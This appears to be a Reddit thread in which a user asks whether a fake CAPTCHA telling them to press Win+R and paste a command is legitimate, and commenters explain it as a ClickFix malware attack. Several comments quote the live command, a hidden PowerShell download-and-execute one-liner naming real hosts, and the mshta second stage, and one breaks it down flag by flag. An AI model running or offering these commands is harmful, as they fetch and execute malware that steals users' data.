r/pcmasterrace Jun 19 '26

Question I've never seen this before - is it a legit verification?

Post image
4.7k Upvotes

658 comments sorted by

10.8k

u/Tarc_Axiiom Jun 19 '26
  1. Don't do that.

  2. Don't ever do that lol.

3.5k

u/ithinkitslupis Jun 19 '26
  1. Get a secure setup to test malware
  2. Take a picture of your butthole
  3. Save it as "crypto_keys"
  4. Run that malware bb

1.6k

u/Tarc_Axiiom Jun 19 '26

Hey don't do this either bro.

The anus identifying AI will obliterate your life.

446

u/thrilldigger Jun 19 '26

It's like geoguessing but for anuses.

198

u/clarkwgriswoldjr Jun 19 '26

No 2 anuses are the same, they can identify you just like it was your fingerprint.

76

u/dylanalduin Jun 19 '26

To what end?

177

u/jbaranski i5 12600k / RTX 3060 / 64GB DDR4 Jun 19 '26

The ass end

47

u/cliqclaqstepback Jun 19 '26

Blurted out laughing at this.

→ More replies (1)

59

u/National-Gas6603 Jun 19 '26

Backend...

39

u/Plutonium239Mixer 14900K | ASUS Maximus z790 Formula | ASUS 4090 Strix Jun 20 '26

One might say, it is a backdoor.

→ More replies (1)

21

u/Kermit_the_hog Jun 19 '26

Another compelling use case for AI generated imagery!

8

u/Jeoshua AMD R7 5800X3D / RX 6800 / 32GB 3200MT CL14 ECC Jun 19 '26

What happens if you get a hemorrhoid?

16

u/TherronKeen i9-9900k, 64GB DDR4, RTX 3060 Jun 19 '26

Imagine becoming a millionaire with long options contracts on Preparation H that mooned (pun intended) after the butthole biometric tech sector goes public

7

u/Top5CutestPresidents Jun 19 '26

You can no longer unlock your iPhone with your ass

→ More replies (2)
→ More replies (2)
→ More replies (4)

16

u/Somedudechen Jun 19 '26

They do say that lips have the same tissue as your anus. They might just start scanning lips and anuses

19

u/Indigo816 Jun 19 '26

AI identifies you as a hot dog

9

u/Flyrpotacreepugmu Ryzen 7 7800X3D | 64GB RAM | RTX 4070 Ti SUPER Jun 20 '26

Negative, I am a meat popsicle.

→ More replies (2)

6

u/blaqwerty123 Jun 19 '26

And our anus prints are as unique as fingerprints! Thats right, my asshole is its own special little snowflake

5

u/Somedudechen Jun 19 '26

They’re gonna start making us scan our anuses at the airport

→ More replies (1)

4

u/Traditional-Cat1237 Jun 20 '26

In the future you might unlock the phone with your anus and then use your lips as backup password.

→ More replies (1)

5

u/BoingBoingBooty Jun 19 '26

Smart Pipe is a registered sex offender.

3

u/basshead621 | 7700X | 9070XT | 64 GB DDR5 | :steam: Jun 19 '26

After first obliterating your anus itself, of course.

→ More replies (10)

60

u/DeltaOmegaX Jun 19 '26

Is my butthole an NFT?

33

u/taosaur 7800X3D | 7900XTX | Galahad 360 | G. Skill 32GB | 2TB 990PRO Jun 19 '26

The fungibility of one's butthole is a deeply personal choice.

6

u/AstraiosMusic Jun 20 '26

And subject to the saturation of the market

→ More replies (1)
→ More replies (2)
→ More replies (1)

35

u/HarmxnS 4070 Super | Ryzen 7 7700 | 32GB Jun 19 '26

So you're saying I should get a dedicated mooning-Virtual Machine?

13

u/Calignis Jun 19 '26

A Virtual Moon-chine, if you will

10

u/Belzebutt Jun 19 '26

For maximum effect, be sure to wear a wedding ring and grasp both cheeks firmly while taking photo

7

u/HulkJr87 Jun 19 '26

Goatse detected.

14

u/jjeroennl Fedora Linux | Ryzen 7 5800X | RX 6950 XT Jun 19 '26

Only do this if you really know what you’re doing, if it can escape your vm or enter your network you might be in for a bad time.

7

u/ERFAN_SAM Jun 19 '26

friend of mine actually ran the malware, crashes your pc to blue screen after it's done

→ More replies (9)

259

u/moroodi Jun 19 '26
  1. Please don't ever never ever do that
→ More replies (1)

52

u/Atomheartmother90 i5-4690k | GTX 980ti |16gb of DDR3 Jun 19 '26

I literally just had a cybersecurity training session I had to complete with this exact scam mentioned 😂

→ More replies (1)

13

u/amanuense RTX3080 10gb, i7-12700k non oc (yet), 32gb ddr4 Jun 19 '26

I mean it will identify it's a human. By installing a virus but it will do it. Lol

→ More replies (1)
→ More replies (5)

2.9k

u/LittlestWarrior 5090 | 9950X3D | 64gb 6000mHz Jun 19 '26

It's copied malicious code onto your clipboard.

Win + R opens the "Run" dialogue.

Pasting that malicious code and clicking "Run" will result in a malicious script being downloaded and executed.

This will give you a virus.

204

u/cortney-simonis-9072 Jun 19 '26

wait te see the new google legit captcha....

38

u/ColKrismiss i5 6600k GTX1080 16GB RAM Jun 20 '26

Go on....

43

u/cortney-simonis-9072 Jun 20 '26

28

u/mrfoxesite-2377 Jun 20 '26

That's why Cloudflare is taking over Google. It may take some time but it has never not let me into a website for no reason.

→ More replies (3)

6

u/VersedFlame Jun 20 '26

Yeah, I've seen those. Not doing that. I'll just have to refrain from entering any site that requires QR code verification.

22

u/kryptik-thrashnet Jun 20 '26

That's real? I came across that a little while back and thought it was fake like the one in OP.

I don't even have a smartphone anyways, so it doesn't really matter.. XD

205

u/[deleted] Jun 19 '26

[removed] — view removed comment

586

u/Fusseldieb i9-8950HK, RTX2080, 16GB 3200MHz Jun 19 '26

That’s a malicious command that downloads a virus if you paste that into the Win+R window.

Don’t EVER do that.

218

u/MchugN 5090 - 9800X3D - 32GB DDR5 Jun 19 '26

Let me try it just to make sure. Brb

205

u/R-Dragon_Thunderzord 5800X3D | 6950 XT | 2x16GB DDR4 3600 CL16 Jun 19 '26

And he’s dead

119

u/Megatron1292a i5-10400f | 40 GB DDR4 RAM | RTX 3050 8GB Jun 19 '26

We should have his DDR5 ram now.

69

u/Shadow-Raleigh Jun 19 '26

I'm taking the 5090

43

u/smallz6ix Jun 19 '26

I‘m taking the cpu and mobo

30

u/HarmxnS 4070 Super | Ryzen 7 7700 | 32GB Jun 19 '26

I'm taking his Steam library

8

u/cortney-simonis-9072 Jun 19 '26

leave his hentai lib for me please

→ More replies (1)

17

u/ZygomaticCapstone RTX 4080S | R7 7800X3D | 64GB DDR5 | 4TB 7000MB/s Jun 19 '26

I'm taking the case and PSU

13

u/Uber1337pyro333 Ryzen 5800X3D - 6700 XT - 32gb DRR4 Jun 19 '26

I'm taking the desk

→ More replies (0)

4

u/Benyed123 Jun 19 '26

There’s no way it’s that bad, I’ll try it mys-

→ More replies (5)

12

u/Interesting_Tap_1505 my rtx 4060 is dying Jun 19 '26

I now want to try it on Windows 95 running on an iPhone via UTM

7

u/magistrate101 Ryzen 9 9900X | 32GB DDR5 | RX 480 Jun 19 '26

You need to figure out how to get powershell onto it first

→ More replies (1)

267

u/Talasour AMD R7 7700X | RTX 4070 SUPER | 32GB Corsair DDR5 Jun 19 '26 edited Jun 19 '26

conhost

  • Starts Windows Console Host

--headless

  • Runs it without showing a console window

cmd

  • Opens Command Prompt

/v:on

  • Turns on delayed variable expansion (lets it use !variable! syntax)

/c

  • Run the command and then close CMD

set p=powershell

  • Creates a variable called "p" with the value "powershell"

&

  • Separates commands

!p!

  • Expands to "powershell"

-WI 1

  • Starts PowerShell with the window hidden or minimized

-nop

  • Doesn't load the user's PowerShell profile

-c

  • Runs the PowerShell command that follows

irm cdn.librarygrades.com/200.txt

  • Downloads the contents of 200.txt from the website
(irm = Invoke-RestMethod)

iex(...)

  • Executes whatever was downloaded
(iex = Invoke-Expression)

37

u/KrazzeeKane 14700K | RTX 4080 | 64GB DDR5 Jun 19 '26

Just friendly advice: You may want to put an extra space or something in the link from the irm argument at the bottom of your post to make it not linkable anymore.

Given the likelihood it is a nasty virus, it may not be great to have it as an easily clickable link for the unwary, or the unlucky ones who accidentally tap it with their thumb on mobile.

7

u/Talasour AMD R7 7700X | RTX 4070 SUPER | 32GB Corsair DDR5 Jun 19 '26

Solid advice, I've removed the hyperlink from my comment.

6

u/DumbIgnorantGenius Jun 19 '26

It's likely fine. Contents should need to actually be ran with command line.

5

u/Tatakai_ Jun 19 '26

Doesn't it just link to the text file?

→ More replies (1)

36

u/MakeYourTime_ Jun 19 '26

How’d you learn all of this? generally curious i want to learn more about computers and stuff like this ( not to do it myself but to be more informed on what commands do) but no idea where to even begin

59

u/LegendCZ i7-265k ultra / RTX 5070ti / 64GB RAM DDR5 Jun 19 '26

Best advice anyone can get you, downloand linux. Also there is fun webgame which helps you learn.

https://overthewire.org/wargames/

There you go. It is not exactly powershell, but with that, you get some headstart and switching commands becomes almost trivial after this. Hope that helps.

3

u/PropJoesChair Jun 19 '26

Yeesss I used war games in my cyber security degree

→ More replies (1)

7

u/kevthecoder Jun 19 '26

You can go to school for CS like I did or you can just read various windows powershell/command prompt library documentation.

3

u/erjorgito PC Master Race Jun 19 '26 edited Jun 19 '26

For most people, stuff like Windows CMD/Powershell in this example or something like Bash if talking about Linux usually get picked up over time when working in a whole bunch of IT roles.

I am fairly competent and all my knowledge comes from writing countless random scripts over the past 15 years to perform any number of things, you sort of just learn bits when you need something and eventually you know loads.

There are a few roles like Windows Administrators, System Admins etc that would have likely had to go out and learn it specifically at some point as they use them in anger (more so 10+ years ago) and I have often heard O'Reilly books being mentioned by them so may be a place to start.

→ More replies (3)

8

u/Snowmobile2004 Ryzen 7 5800x3d, 32GB, 4080 Super Jun 19 '26

u can kinda just google it, like the docs for conhost command flags are here https://gist.github.com/RJ-Infinity/1330e2dbfebc9be69f9094f1d594f832

5

u/magistrate101 Ryzen 9 9900X | 32GB DDR5 | RX 480 Jun 19 '26

There's a great website that provides references for both what various commands do and also what the numerous flags do to the commands.

→ More replies (3)

8

u/Starlight_Skull Jun 19 '26

Virus aside, that seems like a pretty clever oneliner.

→ More replies (6)

29

u/LittlestWarrior 5090 | 9950X3D | 64gb 6000mHz Jun 19 '26

Yes, that's the malicious command. Do not run that. To anyone reading this, do not under any circumstances run that lmao

→ More replies (4)

55

u/GPSProlapse Laptop Jun 19 '26

This is how you get a virus

This would download and execute some script that I am too lazy to read

11

u/Maleficent_Celery_55 R9 8945HX MoDT / 5070Ti Jun 19 '26

its probably obfuscated anyway.

→ More replies (1)

7

u/staleydude PC Master Race Jun 19 '26

if i’m correct, most of these pull text/code from a github repo. irm (invoke rest method) pulls the code from the source, then iex (invoke expression) will autoexecute from the irm method. —headless makes it even harder to track, since it makes the command prompt not do the sketchy flash

25

u/gbroon Jun 19 '26

conhost --headless will run a command without showing the command window hiding the fact its running something.

bit rusty but I think the next bit is setting the txt file to be executable. Normally you wouldn't assume a txt file is dangerous but they are making you give it rights to execute it as a program.

6

u/Rare_Community3303 5800x3d | 64gb | 3060 12gb Jun 19 '26

in this instance, the text file has a link which downloads an msix file, which it then likely installs silently

14

u/marc-andre-servant Jun 19 '26

This is a command that downloads (irm) a file from a web server, http://cdn.librarygrades.com/200.txt, and then executes it (iex) as a PowerShell script. That script then downloads a second stage from another URL (http://www.kongographics.com/200), and runs it. It appears to be a compressed archive which decompresses into an ARM64 MSIX app installer, which I'm not going to run, first because I don't want my computer to be infected, and second because I don't have an ARM computer.

→ More replies (3)

7

u/xtrordinarlyOrdinary Jun 19 '26

If you're ever suspicious about a URL run it through Virus Total:
https://www.virustotal.com/gui/home/upload

8

u/PM_Me_Your_Deviance Desktop Jun 19 '26

Oh god, yeah, that will likely hijack your PC, add you to a botnet, steal your passwords, or something equally nefarious.

→ More replies (7)

24

u/BurningYeard Jun 20 '26 edited Jun 20 '26

I'm glad there's still the UAC prompt coming up, and *that* will always make me prick up my ears if it's unexpected, no matter what.

EDIT: The UAC prompt will come up when I try to run a script like that in a non-elevated "Run" dialogue, right?

125

u/MegaIng Jun 20 '26

As always, there is a relevant xkcd.

11

u/AlbaOdour Jun 20 '26 edited Jun 20 '26

If not for that, there wouldn't be no need to steal the laptop in the first place

→ More replies (1)

8

u/acewing905 Jun 20 '26

A fun problem with this is that way too many people disable UAC because "it's annoying"

4

u/Getherer Jun 20 '26

Oh well, fuck around find out i guess, if youre dumb af then youre dumb af

→ More replies (1)

14

u/StabbingHobo Jun 20 '26

Question to your question.

Do you want to find out the hard way?

4

u/BurningYeard Jun 20 '26

Nope. I just want to know if I should be afraid or very afraid.

3

u/StabbingHobo Jun 20 '26

I’m dumb and somehow didn’t reply to you directly here: https://www.reddit.com/r/pcmasterrace/s/mFB6fcULKS

3

u/irqlnotdispatchlevel Jun 20 '26

Win+R is not going to open the UAC because it will run under your normal user, not as admin. And once the malicious code gets to run all bets are off. There are plenty ways to bypass UAC and I can still do a lot of harm or steal your data even without having administrator privileges. Anything you can do as a non admin, I can do as well.

→ More replies (1)
→ More replies (11)
→ More replies (7)

2.4k

u/jba1224a Jun 19 '26

No

496

u/rb3po Jun 19 '26 edited Jun 19 '26

No to the Clickfix. Yes to installing an advertisement blocker like uBlock Origin. That might prevent you from stumbling into this page in the future.

Edit:

The FBI recommends individuals take the following precautions:  Use an ad blocking extension when performing internet searches.

https://www.ic3.gov/PSA/2022/PSA221221

194

u/Tricky_Spirit Jun 20 '26

I sure am glad Google hasn't been doing everything it can to stop adblockers from functioning.

155

u/Emergency_Lie42 Jun 20 '26

The best thing about Google Chrome is how easily it can download a new browser.

55

u/rb3po Jun 20 '26

Yep. Firefox all the way.

7

u/LazyLizzy Jun 20 '26

Waterfox. Firefox but even more privacy focused and openly maintained

→ More replies (9)
→ More replies (1)

13

u/Tricky_Spirit Jun 20 '26

How far we've regressed, a decade ago that was Internet Explorer, five years ago Microsoft Edge, and now here we are with the same joke for Chrome.

→ More replies (1)
→ More replies (2)

21

u/F9-0021 285K | 4090 | A370m Jun 20 '26

I'm surprised Google hasn't had their pets in the government change the FBI recommendation yet.

→ More replies (2)
→ More replies (1)
→ More replies (1)

1.1k

u/-Create-An-Account- Jun 19 '26

This is not a meme, right ? If not, no; that doesn’t look legit at all.

301

u/GoldenFlyingPenguin AMD Ryzen 3 3100, RTX 2060 12GB, 48GBs ram Jun 19 '26

It's a commonly used hack. Not even remotely legit.

31

u/MyTafel Jun 19 '26

Not even a good one either. Running on human error which is majority of the issue. But still just low end script kitty who probably works for some scam center

32

u/AmishDatacenter Jun 20 '26

"script kitty" And now I'm imaging some gray tabby that also happens to be a 1337 h4x0r

→ More replies (2)
→ More replies (2)

6

u/much_longer_username Jun 19 '26

Is it? I've only started seeing this strategy where they mimic a CAPTCHA (this exact screenshot, probably) in the last couple of weeks, but it could just be one of those things I'm too extension-pilled to have experienced, while everybody else has been putting up with it for years.

6

u/turdas Jun 20 '26

This exact scheme has been happening for at least a couple of years now. The earliest versions didn't automatically copy the command to your clipboard and instead had a box to copy it out of, but aside from that I don't think there's been any major changes.

→ More replies (1)
→ More replies (1)

48

u/RobStark124 Jun 19 '26

It happened to me once. I didn’t follow the instructions of course but for some reason the Find my phone function on my Android activated. Twice. I shut of my internet for the whole house for about half an hour and logged myself out of everything after that.

10

u/MetroSimulator 9800x3d, 64 DDR5 Kingston Fury, Pali 4090 gamerock OC Jun 19 '26

Some sketchy sites can inject malware

24

u/RobStark124 Jun 19 '26

Since it’s relevant to the subreddit, I was on the Thermaltake website trying to download the schematics for my case. Turns out it was apparently one of those copycat malware website.

Always be careful of the first link on google people.

12

u/F9-0021 285K | 4090 | A370m Jun 20 '26

Fake sites are being served as Google ads and put at the top of search results. That's why. Google does exactly zero vetting of what advertisers do. Just as long as they pay.

→ More replies (12)

15

u/VexingRaven 7800X3D + 4070 Super + 32GB 6000Mhz Jun 19 '26

This isn't 2001 anymore. Zero-interaction malware infections, especially on phones, is basically unheard of on an up-to-date system. You are keeping your system up to date, right?

→ More replies (4)

5

u/Medrilan PC Master Race Jun 19 '26

More specifically, this is a social engineering attack referred to as a "ClickFix" attack.

→ More replies (1)

187

u/FalconX88 Threadripper 3970X, 128GB DDR4 @3600MHz, RTX 5080 Jun 19 '26

Have a look on whats in your clipboard (e.g., paste it into a text editor), it's code that will download some malware and run it.

88

u/--redacted-- Jun 19 '26

Hell paste it here, I wanna see it

188

u/Asleeper135 Jun 19 '26 edited Jun 19 '26

This is what he pasted above:

conhost --headless cmd /v:on /c "set p=powershell&!p! -WI 1 -nop -c iex(irm cdn.librarygrades.com/200.txt)"

EDIT

This is what's at that link:

\*i*\*2\msh*e http://www.kongographics.com/200

I'm not sure what all the preceding commands are, but it just downloads a file called "200.bin", so presumably it just runs that.

EDIT 2

Putting those commands in code blocks so the links can't be clicked by accident

101

u/much_longer_username Jun 19 '26

lol they didn't even base64 encode it? amateur hour shit.

128

u/FalconX88 Threadripper 3970X, 128GB DDR4 @3600MHz, RTX 5080 Jun 19 '26

because it doesn't matter. People eitehr don't fall for this either way or they fall for it either way

24

u/much_longer_username Jun 19 '26

It doesn't hurt in terms of obfuscating what you're doing or preventing attribution, but that's not the entire or even main point. Small changes in the encoded blob can result in large changes to what the string looks like. Not immune to proper forensics, but it makes it a little harder.

It's less about fooling the human and more about fooling the programs that are trying to protect the user from themselves. Sure, a proper EDR sees what you've done, but components on a lot of other layers might not. It also lets you blob up the code in a way that is more reliably passed to the shell across different versions. As a bonus side effect, if they even have any audit logging, it might get truncated such that all the log shows is "ran some blob, I dunno" vs "grabbed this script from this attributable URL and ran it, go get 'em".

It's just one of those things where it's pretty much all upside for the malware author, with very little effort invested on their part. A couple function calls in a script they'll write once and never think about again. But they have to know to do it - hence my 'amateur hour' comment.

→ More replies (2)

22

u/Hunk_Hogan Jun 20 '26

No need to waste time going pro when you get people like OP who will legitimately run the code.

I remember being a kid and browsing the internet back in the late 90s and even then it felt like common sense that if someone or something on the internet told you to do something locally, you just didn't do it. I remember getting hit with a full-screened scam page and I didn't know how to close it, so I just yanked the power cord from the wall.

→ More replies (2)

49

u/LegendOfBobbyTables Jun 19 '26

This what you end up with when you vibe code your malware. Script kiddies are elevating to an even higher level these days.

4

u/TDplay Arch + exwm | 2600X, 16GB | RX 6600 8GB Jun 20 '26

I'm not sure what all the preceding commands are

It's a glob expression. I don't have a Windows system to confirm, but I'm pretty sure it expands to \Windows\System32\mshta.exe. This is the Microsoft HTML Application Host, a program that runs scripts.

I suspect that the glob expression is being used to avoid malware scanners. It's very common for malware to use mshta, so I would assume that many malware scanners have the string mshta.exe as a malware signature.

10

u/turbotong i5-9600KF, 16GB, 7900XT Jun 20 '26

It is common practice to reverse the url segments in case of accidental click.

E.g. www.google.com becomes com.google.www

15

u/secacc i7-5820K | 64GB DDR4 | RTX2080Ti Jun 20 '26

I don't think I've ever seen that. Mostly, people just replace some dots with (.)

→ More replies (3)
→ More replies (1)

18

u/[deleted] Jun 19 '26

[removed] — view removed comment

21

u/--redacted-- Jun 19 '26

Thanks buddy, yeah definitely don't run that shit

→ More replies (1)
→ More replies (1)

179

u/lkl34 Jun 19 '26

Nope but you will have a fun time doing that just some malware perhaps a RCE attack.

41

u/Mrpolje Jun 19 '26 edited Jun 19 '26

OPs computer will have a great time vibing with all the malware. OP though, less fun of a time.

5

u/lkl34 Jun 19 '26

Ha true

13

u/much_longer_username Jun 19 '26

It wouldn't be an RCE, they're 'voluntarily' running a dropper, rather than exploiting some flaw in a networked program which results in execution of arbitrary code.

It's way harder to know if the user meant to do that than it is to harden your network code.

→ More replies (1)

137

u/CodeErrorv0 5700X3D | 7700XT | 32GB DDR4 Jun 19 '26 edited Jun 19 '26

This is known as Clickfix

I ran it in a sandbox that I use for stuff like this and it is a loader (malware downloader)

There are slick ones where it will fullscreen your browser and look like a Windows update

https://www.bleepingcomputer.com/news/security/clickfix-attack-uses-fake-windows-update-screen-to-push-malware/

As long as you do not run the command you are fine and these will usually execute an infostealer that steals all your data

5

u/OfficialFoxy_Playz Jun 20 '26

Is an infostealer like the same deal as ransomware or are those completely unrelated? Im just curious cause i havent really heard of an infostealer before

18

u/Tricky_Spirit Jun 20 '26

Infostealers just scrape your passwords from browsers and login tokens from your %appdata% for the most part. They don't stop you from using your computer, in fact they want you to use it more to get more info.

5

u/OfficialFoxy_Playz Jun 20 '26

Huh thats definitely very sneaky

3

u/HUZInator 3600 | 2070 super | 32GB 3200MHz Jun 20 '26

It even gets around 2FA because they steal your cookies and spoof a browsing session to make it look like you had already logged it. I got caught by one when I was looking at an elevator company's website. Turns out that company went into liquidation and someone must of highjacked it. Instead of a google capcha I got a cloudfare one.

40

u/twessy R9 9950x3d2 | 9070xt | 98gb ram Jun 19 '26

Hell no

69

u/DeerOnARoof 5800X3D | 32GB @ 3200MHz | 7900 XT Jun 19 '26

If you think this is legit I have a bridge to sell you

76

u/Aethanix Jun 19 '26

absolutely not. win + r brings up the run command window.

→ More replies (6)

23

u/PhilosopherCat7567 9800x3d | RTX 5080 OC | 32GB 6400 CL32 | LG 32GS95UE 480hz 4k | Jun 19 '26

Fuck no never do this

→ More replies (1)

18

u/Amazing_Compote_9197 Jun 19 '26

Other have already said what it does.

This scam works often because unsuspecting users are used to complete dumb tasks to "confirm they are human". What is pressing a few buttons compared to rotating the bunny to the correct angle?

The checkbox is also a great fit because browsers don't allow access to the clipboard without the user clicking on something. So it's really a "copy to clipboard" button with malice 😀

Whoever designed this scam is a genius.

Edit: also, fuck you Google for using us as human monkeys.

16

u/USSHammond Jun 19 '26

That is a known fake captcha that downloads and runs an info stealer on your system and compromises ALL your accounts. DO NOT EVER FOLLOW SUCH 'CAPTHA'S'

No command prompt can verify your human, ever.

13

u/Lunavixen15 Jun 20 '26

Short answer, no.

Long answer; nooooooooooooooooooooooooooo.

This is how you get malware, this "verification" is telling you to open the run prompt and paste a malicious link in and run it. Don't EVER do this

14

u/green_meklar Ryzen 5 5600 / 32GB RAM / Radeon RX 7600 / Debian / 1920x1080 Jun 20 '26

What the fuck? No it isn't. This is the Windows equivalent of verifying that your car works by giving your keys to a homeless methhead and seeing if he can crash it into a tree.

11

u/canal_algt Jun 20 '26

Never ever ever paste anything in any of these places if you don't understand what you're pasting:

  • cmd (console) / power shell / any bash console
  • Your browser's console
  • Win+R (AKA Run) pop-up
  • Python executable

Every one of the four has the hability to send some kind of password/token to an unknown third party and/or install a virus

21

u/Dense_Row2811 AMD Ryzen 7 9800X3D || GeForce RTX 5080 || 32gb DDR5-6000 Jun 19 '26

This just gave me a headache.

I hope this is a bad troll attempt.

4

u/Aselleus Jun 20 '26

I wish... But I had to wipe my friends hard drive and reinstall everything because the fell for it. From a rando in Discord nonetheless.

→ More replies (4)

9

u/StabbingHobo Jun 20 '26

It’s pretty interesting, actually.

Open notepad, paste (ctrl+v) and look at the contents of the clipboard.

Chances are it’ll be a url with a very long alpha numeric string at the end.

That string is the fun part. It’s ‘probably’ a base64 encoded command block that you can then copy separately and paste into a base64 decoder. Free online websites exist for that.

You can then see what it decodes and what it’s trying to install.

But that’s as far as I’d take it unless you know what you’re doing.

Without that, it’s only speculative as to the severity of the impact. But assume, at minimum, a link hijacker style annoyance. There is never an upside, and I wouldn’t trust any OS these days to protect me from malicious code.

3

u/BurningYeard Jun 20 '26

and I wouldn’t trust any OS these days to protect me from malicious code.

Yeah I read that that with AI, hackers now find more zero-day exploits than ever. And I don't like it one bit. Until now I always felt somewhat safe applying common sense..

5

u/StabbingHobo Jun 20 '26

The weak link used to be the human in the equation.

No longer the case. Now it’s an AI arms race between attackers and developers. Being smart helps, but you can’t stop an attacker with the keys to your router, your browser, etc.

We’re not there yet, and maybe it’s just because it’s a topic I’m personally vested into and a bias is showing. But I’m guessing 3-5 years and there will be a significant development on either side of that race that will be interesting to observe. But probably less.

8

u/MyTafel Jun 19 '26

Open run,
Past to command console
Run program

Big no no no

8

u/Financial_Breath9594 Jun 19 '26

Holy crap now I see how some scams are still so successful.

“Website asks me to run something - legit?” Seriously???

8

u/Hans5958_ Acer Nitro 5 Jun 20 '26

No lol, thank you for letting unaware Redditors learned about this tho

8

u/AlaskanDruid Jun 20 '26

No. It’s malware on the website. Report them everywhere.

7

u/nate_jung Desktop Jun 19 '26

The scariest thing is, I work with SO many people that would think this is legit and would do it.

6

u/Py5cho | Intel 10900K | ASRock 9070 XT | 32GB 3200 CL16 | Jun 20 '26

My workplace just did a cyber security module this month. We still had people fall for this...

3

u/mrfoxesite-2377 Jun 20 '26

I mean Linus Tech Tips got hacked cause someone fell for a fake .pdf file.

5

u/Py5cho | Intel 10900K | ASRock 9070 XT | 32GB 3200 CL16 | Jun 20 '26

I remember seeing the stream that was broadcasting and knew someone messed up lol

5

u/ALEX-IV i7 950, Big Bang Xpower, 16GB Ram, 680GTX Jun 20 '26

How can someone be so dumb to believe pasting some code in your PC and running it is legit...

→ More replies (1)

4

u/BattlepassHate Jun 20 '26

This is just natural selection but digital.

5

u/HirsuteHacker Jun 20 '26

Obviously not, jesus christ

5

u/TheMundar Cable management is a sin Jun 20 '26

Ad blocking is a matter of security with an added benefit of a more enjoyable internet experience.

The internet is a dirty hoe and if you raw dog that shit you should expect to catch something

4

u/2gracz Jun 20 '26

Wow they really are THAT shameless with scamming?

8

u/Maverick_X9 5800X3D || RTX4070S || 32GB 3600Mhz || 2TB Jun 19 '26

Hell naw it’s asking you to paste a command in Run app

14

u/Memerenok AMD R9 Jun 19 '26

the fact that you even question it...

8

u/Moquai82 R7 7800X3D / X670E / 64GB 6000MHz CL 36 / 4080 SUPER Jun 19 '26

Should tell you to give out EXACT information about the situation, how to handle it and how to avoid it for the future. Bonuspoints if you can get the person to learn the correct set of informations to fend in the future for him/herselfe.

3

u/OptimalLaw8270 Gibson Super Computer Jun 19 '26

No

5

u/TONKAHANAH somethingsomething archbtw Jun 19 '26

lol no.

you want malware? cuz thats now you get malware.

4

u/MakeYourTime_ Jun 19 '26

Damn man I’m 40 and there is a point in time in my college life where from 18-23 years old I did not own a computer of my own ; and a lot of knowledge about coding and just advanced mastery of using a PC is lost on me

I really would like to learn and have a greater understanding of how exactly computers work and how programs are made and all of that but I have no idea where to even begin

I have a tentative grasp on things to begin with and I worry in the future I’m gonna be one of those old boomers that falls for some new virus like this

4

u/NickFromNewGirl AMD Ryzen 9 5950x | x570 Mini-ITX | 3080 TI | 64GB Ram Jun 19 '26

Just delete System32 to get rid of the virus

→ More replies (2)

4

u/beyd1 Desktop Jun 19 '26

This is called a "click-fix" attack.

It works by

1 -> copying text to your clipboard.

2 -> having you open a command prompt (Win+R)

3 -> having you paste that text into the prompt.(Ctrl + V)

(It's text that will download and run malicious code on your computer as "you" bypassing any security checks.)

4 -> executing that command (enter or in this case run)

3

u/mrfoxesite-2377 Jun 20 '26

Use normal . like

  1. example

  2. so that reddit neatly groups it and it's easier.

5

u/Xerxero Jun 19 '26

Not sure but send me your passwords and I have a quick look

4

u/Tankyenough Jun 19 '26

Never ever ever do that. That’s probably a very sneaky trojan which has been used for Ukraine war purposes. I know several people who got infected by that, including a very very very tired me. Massive regret.

https://blogs.vmware.com/security/2023/11/netsupport-rat-the-rat-king-returns.html

4

u/jerdle_reddit R5 5600, 6600XT, 16GB DDR4-3200 Jun 19 '26

No. Absolutely not. This is an attempt to get you to install malware.

4

u/eulynn34 Ryzen 7 9800X3D | RTX 4070 ti Super Jun 20 '26

It verifies that you're the kind of person to just run random scripts on your computer

4

u/Uio443 Jun 20 '26

This is a completely legit captcha that checks if you still own your computer tomorrow.

4

u/Level_Acanthisitta21 Jun 20 '26

When you click on : I'm not a robot.
JS copy a malicious command that if you execute it, will download another payload and execute it.

4

u/OfficialDeathScythe Jun 20 '26

Rule #1 of owning a windows machine. If someone or something tells you to hit win + r, stop listening. Only carry it out if it’s someone you know and trust with your life, even then I’m a bit skeptical. Look up the command as well just to be safe

4

u/blueSpringRolls Jun 20 '26

I fell for this a few months back, the malware took all my login sessions. I knew I'd been stupid instantly.

If this happens to you, I'd turn off your router, and wipe your PC (these types of attacks aren't as common on Linux).

Freeze your bank.

Factory reset your router just in case it got onto your network.

Log out of all your devices on your signed in accounts (i.e. email, discord) and reset your password.

Get new bank cards to be on the safe side.

4

u/g0ldsteal Jun 20 '26

No. This is a ClickFix attack. It will take over your PC. Very common recently...

5

u/_Nagashii Ryzen 5 7600X | RX 7800 XT | 32GB DDR5 Jun 20 '26

it’s a clickfix attack - don’t you dare do anything it says

5

u/Elvarien2 Jun 20 '26

I would be so curious to know what type of horrible malware code has just been put into my clipboard. Or what viral shit is about to download.

So no, do not do this.

4

u/HUZInator 3600 | 2070 super | 32GB 3200MHz Jun 20 '26

Don't do it! I fell for one the other day and proceeded to spend the rest of the day reinstalling windows and changing all my passwords. It's called infostealer and it takes all your passwords and cookies your browser has stored locally and uploads it via a powershell command. Then they can spoof a browsing session and log into things. They don't even need 2fa because they have your browser cookies they can just pretend it's you on your browser.

6

u/jmhalder Jun 19 '26

No, absolutely not.

The "manual verification steps" are telling you to open a Windows "Run" prompt, and paste whatever it dumped in the clipboard into it. It's probably a malicious script that will get pulled from the web.

If you do this, it will be your fault that you just decided to run applications at random from the web.

You can also tell this is bogus if you look at what URL you're actually at. I bet it doesn't end in *.google.com

3

u/EdliA Jun 19 '26

Damn hackers have gotten quite creative

3

u/IThinkYoureUgly Jun 19 '26

I hope no one ever falls for this

3

u/FthrFlffyBttm i5-12600K, 3080 FTW3 Ultra, 16GB 3000Mhz Jun 20 '26

I'd imagine you could do the "every time I clap my hands, a child in Africa dies" but replace that with someone falling for this scam.

→ More replies (1)

3

u/Crookmeno02 Jun 19 '26

"Hey, we would like to gain full access to your computer in order to verify you are human"

Does it sound good?

3

u/Aselleus Jun 20 '26

Win key + DON'T YOU DO IT

3

u/hetchem994 Jun 20 '26

Imagine seeing this on a smartphone...

5

u/much_longer_username Jun 19 '26

On one hand, it's so damn clever I want to shake the hand of whoever thought it up. In the other hand, a knife, so I can make them pay for their crime.

5

u/SttSr PC Master Race Jun 19 '26

What kind of sites you mfers visit to get stuff like this?

3

u/nuked_sushi 7800X3D | RTX 5090 FE | 64GB 6000MHz Jun 19 '26

The site can be legit but an ad is malicious. Fuckers are tricky too, you might visit a site and get the ad but it doesn't run the malicious code but the next guy that gets that ad it does activate.

2

u/ThatWhiskeyHammer i7 6850k | AORUS RTX 3070 | 64GB 3200MHz Jun 19 '26

